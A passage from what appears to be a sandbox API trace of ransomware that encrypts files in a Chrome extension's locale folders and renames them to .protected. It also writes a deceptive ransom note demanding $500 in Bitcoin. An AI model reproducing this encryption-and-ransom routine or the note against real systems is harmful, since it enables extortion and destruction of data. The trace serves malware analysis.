(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.033] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.033] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.033] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.033] CloseHandle (hObject=0x164) returned 1 [0079.033] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.033] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0079.033] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0079.033] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0079.033] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0079.033] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0079.033] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms") returned 141 [0079.033] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0079.033] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0079.033] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\*") returned 143 [0079.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.034] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.034] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.034] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.034] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.034] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.034] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\.") returned 143 [0079.034] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.034] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.034] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.034] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.034] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.034] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.034] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.034] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\..") returned 144 [0079.034] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.034] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.034] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.034] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.034] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.034] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.034] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.034] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.034] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0079.034] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.034] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.034] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.034] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.036] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0079.036] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.036] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0079.036] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.036] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0079.036] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.036] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0079.037] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.037] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0079.037] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.037] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.037] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.037] CloseHandle (hObject=0x168) returned 1 [0079.038] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.protected") returned 165 [0079.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.protected")) returned 1 [0079.038] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.038] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.038] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\RESTORE_FILES.txt") returned 159 [0079.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.039] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.039] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.039] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.039] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.040] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.040] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.040] CloseHandle (hObject=0x164) returned 1 [0079.040] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.040] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0079.040] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0079.040] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0079.040] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0079.040] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0079.040] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl") returned 141 [0079.040] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0079.040] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0079.040] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\*") returned 143 [0079.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.040] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.040] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.040] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.040] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.040] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.040] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\.") returned 143 [0079.041] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.041] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.041] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.041] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.041] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.041] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.041] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.041] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\..") returned 144 [0079.041] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.041] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.041] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.041] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.041] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.041] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.041] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.041] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.041] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0079.041] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.041] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.041] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.041] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.041] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0079.041] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0079.042] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0079.042] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.042] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0079.042] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.043] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0079.043] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.043] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.043] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.043] CloseHandle (hObject=0x168) returned 1 [0079.043] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.protected") returned 165 [0079.043] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.protected")) returned 1 [0079.043] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.044] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.044] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\RESTORE_FILES.txt") returned 159 [0079.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.044] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.044] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.044] lstrlenA 